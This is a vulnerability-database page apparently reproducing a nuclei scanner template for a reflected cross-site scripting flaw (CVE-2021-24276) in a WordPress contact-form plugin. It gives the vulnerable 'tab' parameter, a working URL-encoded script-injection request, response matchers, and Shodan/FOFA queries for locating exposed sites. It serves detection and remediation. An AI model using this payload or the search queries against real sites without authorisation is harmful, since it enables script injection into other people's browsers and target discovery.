Lucene search
K

WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 38 Views

WordPress Supsystic Contact Form plugin <1.7.15 Cross-Site Scripting vulnerabilit

Related
Refs
Code
id: CVE-2021-24276

info:
  name: WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting
  author: dhiyaneshDK
  severity: medium
  description: WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress Supsystic Contact Form plugin (1.7.15 or higher) to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c
    - http://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24276
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24276
    cwe-id: CWE-79
    epss-score: 0.16044
    epss-percentile: 0.96523
    cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: supsystic
    product: contact_form
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/contact-form-plugin/
    fofa-query: body=/wp-content/plugins/contact-form-plugin/
    publicwww-query: /wp-content/plugins/contact-form-plugin/
  tags: cve2021,cve,wordpress,wp-plugin,wpscan,packetstorm,supsystic,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402204ae485487d5f28e4596744e2701278fee4efd7a7be85c48f888169c783b2e97102201fb2303dee51fea491cdfc287edb9783c7b4e0fd0126cf640545a2050f665330:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.16044
38